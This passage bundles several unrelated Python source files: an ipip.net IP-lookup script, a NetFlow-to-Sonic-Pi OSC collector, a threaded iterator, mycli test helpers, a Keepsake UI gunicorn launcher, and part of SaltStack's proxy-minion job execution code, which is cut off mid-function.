    return webdriver.Chrome(options=option)


def selenium_ip(url, ip_addr):
    """Drive a real browser through the query form; cache its cookies."""
    driver = create_driver()
    driver.implicitly_wait(10)
    driver.set_page_load_timeout(10)
    driver.get(url)
    ele = driver.find_element_by_xpath("/html/body/div[2]/form/input")
    if ip_addr:
        ele.clear()
        ele.send_keys(ip_addr)
    ele.send_keys(Keys.ENTER)
    save_cookie(driver)
    return driver.page_source


def save_cookie(driver):
    pickle.dump(driver.get_cookies(), open(PATH_COOKIE + "cookies.pkl", "wb"))


def load_cookie():
    """Return cached cookies as a name->value dict, or None when absent."""
    cookies = pickle.load(open(PATH_COOKIE + "cookies.pkl", "rb")) \
        if os.path.exists(PATH_COOKIE + "cookies.pkl") else None
    if cookies:
        cookie_set = dict()
        for cookie in cookies:
            cookie_set[cookie['name']] = cookie['value']
    else:
        return None
    return cookie_set


def create_table(rows):
    """Turn parsed row lists into PrettyTable objects (first row = header)."""
    tables = []
    for row in rows:
        pt = PrettyTable(row[0])
        for item in row[1:]:
            pt.add_row(item)
        tables.append(pt)
    return tables


def domain_ip_parser(ip_or_domain_or_url, local_dns, ipv6):
    """parsing the arg to get the hostname to query."""
    if ip_or_domain_or_url.startswith("https://") or ip_or_domain_or_url.startswith("http://"):
        ip_or_domain = ip_or_domain_or_url.split('/')[2]
    elif ip_or_domain_or_url == ".":
        ip_or_domain = ""
    else:
        ip_or_domain = ip_or_domain_or_url
    if local_dns:
        import socket
        ip_or_domain = socket.gethostbyname(ip_or_domain)
    elif ipv6:
        import socket
        ip_or_domain = socket.getaddrinfo(ip_or_domain, None, socket.AF_INET6)[0][-1][0]
    return ip_or_domain


def main():
    parser = argparse.ArgumentParser(
        description="A script that helps you to get information via https://ipip.net")
    parser.add_argument('ip_or_domain_or_url', type=str,
                        help="Input the hostname or the url specifices the hostname you want to query. Pass nothing or a dot(.) to query where you are.",
                        default='.', nargs='?')
    parser.add_argument('-l', "--local", action='store_true', dest="local_dns",
                        help="query host in local, and default is on IPIP's server")
    parser.add_argument('-w', "--webbrowser", action='store_true', dest="browser",
                        help="open https://ipip.net in webbrowser")
    parser.add_argument('-e', "--english", action='store_true', dest="en",
                        help="use en.ipip.net as source. Since Chinese version will challenge visiter now, use -e may make it faster.")
    parser.add_argument('-6', action="store_true", dest="ipv6",
                        help="query for ipv6 address")
    tables = []
    args = parser.parse_args()
    if args.browser:
        import webbrowser
        webbrowser.open("https://www.ipip.net/ip.html")
        return
    if args.en:
        URL = "https://en.ipip.net/ip.html"
    else:
        URL = "https://www.ipip.net/ip.html"
    rb = Rainbow("已经在努力查询啦")
    rb.start_shining()
    ip_or_domain = domain_ip_parser(
        args.ip_or_domain_or_url, args.local_dns, args.ipv6)
    # BUG FIX: forward the -e flag; the original always took the
    # cookie/selenium path even when the English site was requested.
    html_tables = request_ip(URL, ip_or_domain, en=args.en)
    for html_table in html_tables:
        # Skip the ad/anti-bot tables that are not geolocation results.
        if str(html_table.th.string) == "网络安全风控基础数据" \
                or (html_table.a and str(html_table.a.string)) == "RTBAsia非人类访问量甄别服务":
            continue
        tables.append(Extractor(html_table).parse())
    printable_tables = create_table(tables)
    rb.stop_shining()
    for table in printable_tables:
        print(table)


if __name__ == "__main__":
    main()
netflow_2_osc.py
#!/usr/bin/env python3
import threading
import time
import argparse
import socketserver


class Handler(socketserver.BaseRequestHandler):
    """A handler for netflow data collector.

    Handles the collected netflow data and passes it to the Aggregator.
    """

    TEMPLATES = {}

    @classmethod
    def set_server_handler(cls, data_handler, host, port):
        """Bind the shared Aggregator, start its consumer thread and build the UDP server."""
        cls.data_handler = data_handler
        data_handler.start_thread()
        server = socketserver.UDPServer((host, port), cls)
        return server

    def handle(self):
        # Imported at point of use so the module can be imported (e.g. for
        # tests) without the netflow v9 collector package installed.
        from collector_v9 import ExportPacket
        data = self.request[0]
        host = self.client_address[0]
        exported_packet = ExportPacket(data, self.TEMPLATES)
        self.TEMPLATES.update(exported_packet.templates)
        self.data_handler.inc()
        current_time = time.time()
        self.data_handler.check_second_passed(current_time)
        self.data_handler.add_val(current_time, [flow.data for flow in exported_packet.flows])
        self.data_handler.print_index()


class Aggregator:
    """Aggregates netflow data on a 1 sec basis and passes the aggregated
    data to the OSC exporter."""

    def __init__(self, exporter):
        self.index = 0
        self.exist = {}        # timestamp -> list of flow dicts, not yet aggregated
        self.complete = []     # whole seconds ready for aggregation
        self.second_passed = threading.Semaphore(0)
        self.prev_time = 0
        self.traffic_types = {'1': 'icmp', '6': 'tcp', '17': 'udp'}
        self.traffic_measures = {"_pps": "IN_PKTS", "_bw": "IN_BYTES"}
        self.exporter = exporter

    def start_thread(self):
        t = threading.Thread(target=self.wait_print)
        t.daemon = True  # setDaemon() is deprecated since Python 3.10.
        t.start()

    def summerize_flows(self, flows):
        """Summerizes flows (per protocol, packets and bytes) and passes them
        to the OSC exporter."""
        by_proto = {}
        for flow in flows:
            for j in flow:
                proto_name = self.traffic_types[str(j["PROTOCOL"])]
                for aspect, measurement in self.traffic_measures.items():
                    key = proto_name + aspect
                    if key not in by_proto:
                        by_proto[key] = int(j[measurement])
                    else:
                        by_proto[key] += int(j[measurement])
        self.exporter.update_traffic(by_proto)

    def inc(self):
        self.index += 1

    def print_index(self):
        print(self.index)

    def get_index(self):
        return self.index

    def add_val(self, time_added, flows):
        self.prev_time = int(time_added)
        self.exist[time_added] = flows

    def print_exist(self):
        print(self.exist)

    def check_second_passed(self, current_time):
        """Checks if a second has passed between received netflow data.

        If a second had passed - a semaphore is upped.
        """
        if self.prev_time != 0 and self.prev_time < int(current_time):
            self.complete.append(self.prev_time)
            self.second_passed.release()

    def wait_print(self):
        """Waits for enough data to be collected, then aggregates it."""
        while True:
            self.second_passed.acquire()
            try:
                if not self.exist or not self.complete:
                    raise KeyError
                current = self.complete.pop(0)
                aggregate = []
                to_erase = []
                for flow in self.exist:
                    if int(flow) == current:
                        aggregate.append(self.exist[flow])
                        to_erase.append(flow)
                self.summerize_flows(aggregate)
                for flow in to_erase:
                    del self.exist[flow]
            except KeyError:
                pass


def server_loop(server):
    """A server that listens on an interface for netflow data.

    NOTE(review): relies on the module-global `args` created by the
    __main__ block for the poll interval.
    """
    try:
        print("Waiting for traffic")
        server.serve_forever(poll_interval=args.poll)
    except (IOError, SystemExit):
        raise
    except KeyboardInterrupt:
        raise


if __name__ == "__main__":
    # Imported at point of use so the module stays importable without the
    # OSC client installed.
    import client_multi_traffic as cmt

    parsed = argparse.ArgumentParser(description='A netflow collector that sends flow to sonic-pi via OSC')
    parsed.add_argument('--port', '-P', type=int, help='Port address for collector')
    parsed.add_argument('--host', '-H', type=str, help='IP address for collector')
    # BUG FIX: the poll interval is fractional (default 0.5); the original
    # declared type=int, truncating any user-supplied interval.
    parsed.add_argument('--poll', '-I', type=float, default=0.5, help='Poll interval')
    parsed.add_argument('--sonicpihost', '-S', type=str, default='172.16.3.27',
                        help='IP address to send flows to over OSC')
    parsed.add_argument('--sonicpiport', '-R', type=int, default=4559,
                        help='Port address to send flows to over OSC')
    # NOTE(review): argparse type=bool treats ANY non-empty string as True
    # (so `-G False` enables graphics); kept as-is for CLI compatibility.
    parsed.add_argument('--graphics', '-G', type=bool, default=False,
                        help='Display graphics <True|False>')
    args = parsed.parse_args()

    # Set up exporter that sends aggregated netflow to sonic pi via OSC
    exporter = cmt.FlowToOsc(args.sonicpihost, args.sonicpiport)
    # A handler that takes care of netflow data flowing into the collector
    data_handler = Aggregator(exporter)
    print("Creating server on host: {}, port: {}".format(args.host, args.port))
    server = Handler.set_server_handler(data_handler, args.host, args.port)
    # Start a thread that listens on an interface for netflow data
    t = threading.Thread(target=server_loop, args=(server,))
    t.start()
    # Runs the exporter that gets the aggregated netflow data and sends it to
    # sonic pi via OSC. Also runs the GUI that draws the netflow data charts.
    # Needs to run from the main thread.
    try:
        exporter.run(args.graphics)
    except (IOError, SystemExit):
        raise
    except KeyboardInterrupt:
        raise
threaded_iterator.py
import queue
import threading
from typing import Any, NamedTuple


class ThreadedIterator(object):
    """Wraps an iterator so its elements are produced on a background thread.

    A worker thread drains the wrapped iterator into a bounded queue, so
    elements are ready ahead of the consumer.  Any exception raised by the
    wrapped iterator is re-raised in the consuming thread.
    """

    def __init__(
        self,
        iterator,
        max_queue_size: int = 2,
        start: bool = True,
    ):
        self._queue = queue.Queue(maxsize=max_queue_size)
        self._thread = threading.Thread(target=lambda: self.worker(iterator))
        if start:
            self.Start()

    def Start(self):
        """Begin draining the wrapped iterator in the background."""
        self._thread.start()

    def worker(self, iterator):
        """Producer loop: forward each element (or a raised error) to the queue."""
        try:
            for element in iterator:
                self._queue.put(self._ValueOrError(value=element), block=True)
        except Exception as e:
            # Ship the exception across the thread boundary to the consumer.
            self._queue.put(self._ValueOrError(error=e))
        # Always terminate the stream with the tombstone marker.
        self._queue.put(self._EndOfIterator(), block=True)

    def __iter__(self):
        while True:
            item = self._queue.get(block=True)
            if isinstance(item, self._EndOfIterator):
                break
            yield item.GetOrRaise()
        self._thread.join()

    class _EndOfIterator(object):
        """Tombstone marker object for iterators."""
        pass

    class _ValueOrError(NamedTuple):
        """A tuple which represents the union of either a value or an error."""
        value: Any = None
        error: Exception = None

        def GetOrRaise(self) -> Any:
            """Return the value, or re-raise the captured exception."""
            if self.error is not None:
                raise self.error
            return self.value
# ---- file: utils.py ----
import os
import time
import signal
import platform
import multiprocessing

import pymysql
import pytest

from mycli.main import special

# Connection parameters, overridable through PYTEST_* environment variables.
PASSWORD = os.getenv('PYTEST_PASSWORD')
USER = os.getenv('PYTEST_USER', 'root')
HOST = os.getenv('PYTEST_HOST', 'localhost')
PORT = int(os.getenv('PYTEST_PORT', 3306))
CHARSET = os.getenv('PYTEST_CHARSET', 'utf8')
SSH_USER = os.getenv('PYTEST_SSH_USER', None)
SSH_HOST = os.getenv('PYTEST_SSH_HOST', None)
# int() so the value has one consistent type whether it comes from the
# environment (a string) or the default (previously str-or-int).
SSH_PORT = int(os.getenv('PYTEST_SSH_PORT', 22))


def db_connection(dbname=None):
    """Return an autocommitting connection to the test MySQL server."""
    # autocommit is passed to connect(): the previous
    # `conn.autocommit = True` shadowed pymysql's Connection.autocommit()
    # *method* with a bool instead of actually enabling autocommit.
    conn = pymysql.connect(user=USER, host=HOST, port=PORT, database=dbname,
                           password=PASSWORD, charset=CHARSET,
                           local_infile=False, autocommit=True)
    return conn


# Probe once at import time whether a MySQL server is reachable; tests that
# need it are skipped (see `dbtest`) when it is not.
try:
    db_connection()
    CAN_CONNECT_TO_DB = True
except Exception:
    CAN_CONNECT_TO_DB = False

dbtest = pytest.mark.skipif(
    not CAN_CONNECT_TO_DB,
    reason="Need a mysql instance at localhost accessible by user 'root'")


def create_db(dbname):
    """(Re-)create the test database.

    NOTE(review): `dbname` is currently ignored — the name `_test_db` is
    hard-coded below.  Callers appear to pass '_test_db' anyway; confirm
    before relying on any other name.
    """
    with db_connection().cursor() as cur:
        try:
            cur.execute('''DROP DATABASE IF EXISTS _test_db''')
            cur.execute('''CREATE DATABASE _test_db''')
        except Exception:
            # Best effort: if the DB cannot be (re)created, the dependent
            # tests are skipped via `dbtest` above.
            pass


def run(executor, sql, rows_as_list=True):
    """Run *sql* through *executor* and return its output as a list of dicts.

    Each dict has 'title', 'rows', 'headers' and 'status' keys; when
    *rows_as_list* is true, row iterators are materialized into lists.
    """
    result = []
    for title, rows, headers, status in executor.run(sql):
        rows = list(rows) if (rows_as_list and rows) else rows
        result.append({'title': title, 'rows': rows, 'headers': headers,
                       'status': status})
    return result


def set_expanded_output(is_expanded):
    """Pass-through for the tests."""
    return special.set_expanded_output(is_expanded)


def is_expanded_output():
    """Pass-through for the tests."""
    return special.is_expanded_output()


def send_ctrl_c_to_pid(pid, wait_seconds):
    """Send a Ctrl-C like signal to `pid` after `wait_seconds` seconds."""
    time.sleep(wait_seconds)
    system_name = platform.system()
    # Windows has no SIGINT for arbitrary processes; use the console event.
    if system_name == "Windows":
        os.kill(pid, signal.CTRL_C_EVENT)
    else:
        os.kill(pid, signal.SIGINT)


def send_ctrl_c(wait_seconds):
    """Spawn a process that Ctrl-C's the current process after `wait_seconds`.

    Returns the `multiprocessing.Process` created.
    """
    ctrl_c_process = multiprocessing.Process(
        target=send_ctrl_c_to_pid, args=(os.getpid(), wait_seconds)
    )
    ctrl_c_process.start()
    return ctrl_c_process
# ---- file: main.py ----
import argparse
import threading
import time
import webbrowser

from gunicorn.app.base import BaseApplication

from keepsake_ui.app import setup_app


class Application(BaseApplication):
    """Gunicorn wrapper that serves an in-process WSGI app from a dict config."""

    def __init__(self, app, options=None):
        self.options = options or {}
        self.application = app
        super().__init__()

    def load_config(self):
        """Forward only options gunicorn actually recognizes."""
        config = {
            key: value
            for key, value in self.options.items()
            if key in self.cfg.settings and value is not None
        }
        for key, value in config.items():
            self.cfg.set(key.lower(), value)

    def load(self):
        return self.application

    def init(self, parser, opts, args):
        # Required by BaseApplication's interface; nothing to do here.
        pass


def parse_args():
    """Parse the CLI options for the UI server."""
    parser = argparse.ArgumentParser()
    default_bind = "0.0.0.0:8080"
    parser.add_argument(
        "-b",
        "--bind",
        type=str,
        help=f"Address port bind (default {default_bind})",
        default=default_bind,
    )
    parser.add_argument(
        "--no-browser", action="store_true", help="If set do not open browser"
    )
    parser.add_argument("-r", "--repository", type=str, help="Keepsake repository")
    return parser.parse_args()


def open_browser(bind):
    """Open the served UI in the default web browser.

    *bind* is gunicorn's "host:port" string, not a URL: webbrowser.open()
    needs a scheme, and 0.0.0.0 binds all interfaces but is not a browsable
    address, so build an http://localhost URL from it.
    """
    time.sleep(1)  # give gunicorn a moment to start listening
    host, _, port = bind.partition(":")
    if host in ("", "0.0.0.0"):
        host = "localhost"
    url = f"http://{host}:{port}" if port else f"http://{host}"
    webbrowser.open(url)


def main():
    """Entry point: optionally open a browser, then run the server."""
    args = parse_args()
    options = {
        "bind": args.bind,
        "workers": 1,
    }
    if not args.no_browser:
        # Daemon thread so a hanging browser launch never blocks shutdown.
        threading.Thread(target=open_browser, args=(args.bind,), daemon=True).start()
    Application(setup_app(args.repository), options).run()


if __name__ == "__main__":
    main()
# ---- file: proxy.py ----
# -*- coding: utf-8 -*-
#
# Proxy minion metaproxy modules
#
'''
Module-level functions that are bound onto Salt's ProxyMinion to implement
the "metaproxy" behavior: pillar/opts resolution, proxymodule loading,
scheduler wiring, and job execution/return plumbing.
'''
from __future__ import absolute_import, print_function, with_statement, unicode_literals

import os
import signal
import sys
import types
import logging
import threading
import traceback

# Import Salt Libs
# pylint: disable=3rd-party-module-not-gated
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.serializers.msgpack
import salt.minion
import salt.defaults.exitcodes
import salt.utils.dictupdate
from salt.utils.event import tagify
from salt.exceptions import (
    CommandExecutionError,
    CommandNotFoundError,
    SaltInvocationError,
    SaltSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import range
from salt.minion import ProxyMinion
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.process import (default_signals, SignalHandlingProcess)

import tornado.gen  # pylint: disable=F0401
import tornado.ioloop  # pylint: disable=F0401

log = logging.getLogger(__name__)


def post_master_init(self, master):
    '''
    Finish proxy-minion setup after the master connection is established.

    Contains ``yield``, so it runs as a tornado coroutine when bound in as
    ``_post_master_init``.  Resolves pillar, loads the proxymodule named by
    ``opts['proxy']['proxytype']``, wires the dunder variables, and installs
    the default scheduler jobs (mine, master-alive, keepalive).
    Raises SaltSystemExit when no usable proxy config is found.
    '''
    log.debug("subclassed LazyLoaded _post_master_init")
    if self.connected:
        self.opts['master'] = master
        self.opts['pillar'] = yield salt.pillar.get_async_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            saltenv=self.opts['saltenv'],
            pillarenv=self.opts.get('pillarenv'),
        ).compile_pillar()
    if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
        errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
            'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
        log.error(errmsg)
        self._running = False
        raise SaltSystemExit(code=-1, msg=errmsg)

    if 'proxy' not in self.opts:
        self.opts['proxy'] = self.opts['pillar']['proxy']

    if self.opts.get('proxy_merge_pillar_in_opts'):
        # Override proxy opts with pillar data when the user required.
        self.opts = salt.utils.dictupdate.merge(self.opts,
                                                self.opts['pillar'],
                                                strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
                                                merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
    elif self.opts.get('proxy_mines_pillar'):
        # Even when not required, some details such as mine configuration
        # should be merged anyway whenever possible.
        if 'mine_interval' in self.opts['pillar']:
            self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
        if 'mine_functions' in self.opts['pillar']:
            general_proxy_mines = self.opts.get('mine_functions', [])
            specific_proxy_mines = self.opts['pillar']['mine_functions']
            try:
                self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
            except TypeError as terr:
                log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
                    self.opts['id']))

    fq_proxyname = self.opts['proxy']['proxytype']

    # Need to load the modules so they get all the dunder variables
    self.functions, self.returners, self.function_errors, self.executors = self._load_modules()

    # we can then sync any proxymodules down from the master
    # we do a sync_all here in case proxy code was installed by
    # SPM or was manually placed in /srv/salt/_modules etc.
    self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])

    # Pull in the utils
    self.utils = salt.loader.utils(self.opts)

    # Then load the proxy module
    self.proxy = salt.loader.proxy(self.opts, utils=self.utils)

    # And re-load the modules so the __proxy__ variable gets injected
    self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
    self.functions.pack['__proxy__'] = self.proxy
    self.proxy.pack['__salt__'] = self.functions
    self.proxy.pack['__ret__'] = self.returners
    self.proxy.pack['__pillar__'] = self.opts['pillar']

    # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
    self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
    self.proxy.pack['__utils__'] = self.utils

    # Reload all modules so all dunder variables are injected
    self.proxy.reload_modules()

    # Start engines here instead of in the Minion superclass __init__
    # This is because we need to inject the __proxy__ variable but
    # it is not setup until now.
    self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
                                self.process_manager, proxy=self.proxy)

    if ('{0}.init'.format(fq_proxyname) not in self.proxy
            or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
        errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
            'Check your proxymodule. Salt-proxy aborted.'
        log.error(errmsg)
        self._running = False
        raise SaltSystemExit(code=-1, msg=errmsg)

    self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
    proxy_init_fn = self.proxy[fq_proxyname + '.init']
    proxy_init_fn(self.opts)

    self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)

    self.serial = salt.payload.Serial(self.opts)
    self.mod_opts = self._prep_mod_opts()
    self.matchers = salt.loader.matchers(self.opts)
    self.beacons = salt.beacons.Beacon(self.opts, self.functions)
    uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
    self.proc_dir = salt.minion.get_proc_dir(self.opts['cachedir'], uid=uid)

    if self.connected and self.opts['pillar']:
        # The pillar has changed due to the connection to the master.
        # Reload the functions so that they can use the new pillar data.
        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
        if hasattr(self, 'schedule'):
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    if not hasattr(self, 'schedule'):
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners,
            cleanup=[salt.minion.master_event(type='alive')],
            proxy=self.proxy)

    # add default scheduling jobs to the minions scheduler
    if self.opts['mine_enabled'] and 'mine.update' in self.functions:
        self.schedule.add_job({
            '__mine_interval':
            {
                'function': 'mine.update',
                'minutes': self.opts['mine_interval'],
                'jid_include': True,
                'maxrunning': 2,
                'run_on_start': True,
                'return_job': self.opts.get('mine_return_job', False)
            }
        }, persist=True)
        log.info('Added mine.update to scheduler')
    else:
        self.schedule.delete_job('__mine_interval', persist=True)

    # add master_alive job if enabled
    if (self.opts['transport'] != 'tcp' and
            self.opts['master_alive_interval'] > 0):
        self.schedule.add_job({
            salt.minion.master_event(type='alive', master=self.opts['master']):
            {
                'function': 'status.master',
                'seconds': self.opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 1,
                'return_job': False,
                'kwargs': {'master': self.opts['master'],
                           'connected': True}
            }
        }, persist=True)
        if self.opts['master_failback'] and \
                'master_list' in self.opts and \
                self.opts['master'] != self.opts['master_list'][0]:
            self.schedule.add_job({
                salt.minion.master_event(type='failback'):
                {
                    'function': 'status.ping_master',
                    'seconds': self.opts['master_failback_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'return_job': False,
                    'kwargs': {'master': self.opts['master_list'][0]}
                }
            }, persist=True)
        else:
            self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True)
    else:
        self.schedule.delete_job(salt.minion.master_event(type='alive', master=self.opts['master']), persist=True)
        self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True)

    # proxy keepalive
    proxy_alive_fn = fq_proxyname+'.alive'
    if (proxy_alive_fn in self.proxy
            and 'status.proxy_reconnect' in self.functions
            and self.opts.get('proxy_keep_alive', True)):
        # if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
        self.schedule.add_job({
            '__proxy_keepalive':
            {
                'function': 'status.proxy_reconnect',
                'minutes': self.opts.get('proxy_keep_alive_interval', 1),  # by default, check once per minute
                'jid_include': True,
                'maxrunning': 1,
                'return_job': False,
                'kwargs': {
                    'proxy_name': fq_proxyname
                }
            }
        }, persist=True)
        self.schedule.enable_schedule()
    else:
        self.schedule.delete_job('__proxy_keepalive', persist=True)

    # Sync the grains here so the proxy can communicate them to the master
    self.functions['saltutil.sync_grains'](saltenv='base')
    self.grains_cache = self.opts['grains']
    self.ready = True


def target(cls, minion_instance, opts, data, connected):
    '''
    Dispatch one published job to the right thread-return handler.

    Lazily constructs and fully wires a minion instance (modules, proxy
    module, dunders) when one is not supplied, then routes to
    _thread_multi_return for compound (list/tuple) functions or
    _thread_return for a single function.

    NOTE(review): uses ``tornado.stack_context``, which is never imported
    here explicitly — it is presumably pulled in transitively by one of the
    salt imports above; confirm before trimming imports.
    '''
    if not minion_instance:
        minion_instance = cls(opts)
        minion_instance.connected = connected
        if not hasattr(minion_instance, 'functions'):
            # Need to load the modules so they get all the dunder variables
            functions, returners, function_errors, executors = (
                minion_instance._load_modules(grains=opts['grains'])
            )
            minion_instance.functions = functions
            minion_instance.returners = returners
            minion_instance.function_errors = function_errors
            minion_instance.executors = executors

            # Pull in the utils
            minion_instance.utils = salt.loader.utils(minion_instance.opts)

            # Then load the proxy module
            minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)

            # And re-load the modules so the __proxy__ variable gets injected
            functions, returners, function_errors, executors = (
                minion_instance._load_modules(grains=opts['grains'])
            )
            minion_instance.functions = functions
            minion_instance.returners = returners
            minion_instance.function_errors = function_errors
            minion_instance.executors = executors
            minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
            minion_instance.proxy.pack['__salt__'] = minion_instance.functions
            minion_instance.proxy.pack['__ret__'] = minion_instance.returners
            minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']

            # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
            minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
            minion_instance.proxy.pack['__utils__'] = minion_instance.utils

            # Reload all modules so all dunder variables are injected
            minion_instance.proxy.reload_modules()

            fq_proxyname = opts['proxy']['proxytype']

            minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()

            proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
            proxy_init_fn(opts)
        if not hasattr(minion_instance, 'serial'):
            minion_instance.serial = salt.payload.Serial(opts)
        if not hasattr(minion_instance, 'proc_dir'):
            uid = salt.utils.user.get_uid(user=opts.get('user', None))
            minion_instance.proc_dir = (
                salt.minion.get_proc_dir(opts['cachedir'], uid=uid)
            )

    with tornado.stack_context.StackContext(minion_instance.ctx):
        if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
            ProxyMinion._thread_multi_return(minion_instance, opts, data)
        else:
            ProxyMinion._thread_return(minion_instance, opts, data)


def thread_return(cls, minion_instance, opts, data):
    '''
    This method should be used as a threading target, start the actual
    minion side execution.
    '''
    fn_ = os.path.join(minion_instance.proc_dir, data['jid'])

    salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))

    sdata = {'pid': os.getpid()}
    sdata.update(data)
    log.info('Starting a new job with PID %s', sdata['pid'])
    # Record the job in the proc dir so it shows up as "running".
    with salt.utils.files.fopen(fn_, 'w+b') as fp_:
        fp_.write(minion_instance.serial.dumps(sdata))
    ret = {'success': False}
    function_name = data['fun']
    executors = data.get('module_executors') or \
        getattr(minion_instance, 'module_executors', []) or \
        opts.get('module_executors', ['direct_call'])
    # NOTE(review): the `if` filter below checks the *literal* string
    # '{0}.allow_missing_func' (never .format()ed with the executor name),
    # so it can never match and allow_missing_funcs is always False.
    # Compare the correctly formatted key on the line above — looks like a
    # bug; confirm against upstream Salt before relying on it.
    allow_missing_funcs = any([
        minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
        for executor in executors
        if '{0}.allow_missing_func' in minion_instance.executors
    ])
    if function_name in minion_instance.functions or allow_missing_funcs is True:
        try:
            minion_blackout_violation = False
            if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
                whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
                # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
                    minion_blackout_violation = True
            # use minion_blackout_whitelist from grains if it exists
            # (plain `if` here, while thread_multi_return uses `elif` —
            # grains are checked even when pillar already decided)
            if minion_instance.opts['grains'].get('minion_blackout', False):
                whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
                if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
                    minion_blackout_violation = True
            if minion_blackout_violation:
                raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
                                          'to False in pillar or grains to resume operations. Only '
                                          'saltutil.refresh_pillar allowed in blackout mode.')

            if function_name in minion_instance.functions:
                func = minion_instance.functions[function_name]
                args, kwargs = salt.minion.load_args_and_kwargs(
                    func,
                    data['arg'],
                    data)
            else:
                # only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
                func = function_name
                args, kwargs = data['arg'], data
            minion_instance.functions.pack['__context__']['retcode'] = 0
            if isinstance(executors, six.string_types):
                executors = [executors]
            elif not isinstance(executors, list) or not executors:
                raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
                                          format(executors))
            if opts.get('sudo_user', '') and executors[-1] != 'sudo':
                executors[-1] = 'sudo'  # replace the last one with sudo
            log.trace('Executors list %s', executors)  # pylint: disable=no-member

            # Run through the executor chain; the first one returning a
            # non-None value wins.
            for name in executors:
                fname = '{0}.execute'.format(name)
                if fname not in minion_instance.executors:
                    raise SaltInvocationError("Executor '{0}' is not available".format(name))
                return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
                if return_data is not None:
                    break

            if isinstance(return_data, types.GeneratorType):
                # Stream generator output back to the master as progress
                # events while accumulating the final return.
                ind = 0
                iret = {}
                for single in return_data:
                    if isinstance(single, dict) and isinstance(iret, dict):
                        iret.update(single)
                    else:
                        if not iret:
                            iret = []
                        iret.append(single)
                    tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
                    event_data = {'return': single}
                    minion_instance._fire_master(event_data, tag)
                    ind += 1
                ret['return'] = iret
            else:
                ret['return'] = return_data

            retcode = minion_instance.functions.pack['__context__'].get(
                'retcode',
                salt.defaults.exitcodes.EX_OK
            )
            if retcode == salt.defaults.exitcodes.EX_OK:
                # No nonzero retcode in __context__ dunder. Check if return
                # is a dictionary with a "result" or "success" key.
                try:
                    func_result = all(return_data.get(x, True)
                                      for x in ('result', 'success'))
                except Exception:
                    # return data is not a dict
                    func_result = True
                if not func_result:
                    retcode = salt.defaults.exitcodes.EX_GENERIC

            ret['retcode'] = retcode
            ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
        except CommandNotFoundError as exc:
            msg = 'Command required for \'{0}\' not found'.format(
                function_name
            )
            log.debug(msg, exc_info=True)
            ret['return'] = '{0}: {1}'.format(msg, exc)
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except CommandExecutionError as exc:
            log.error(
                'A command in \'%s\' had a problem: %s',
                function_name, exc,
                exc_info_on_loglevel=logging.DEBUG
            )
            ret['return'] = 'ERROR: {0}'.format(exc)
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except SaltInvocationError as exc:
            log.error(
                'Problem executing \'%s\': %s',
                function_name, exc,
                exc_info_on_loglevel=logging.DEBUG
            )
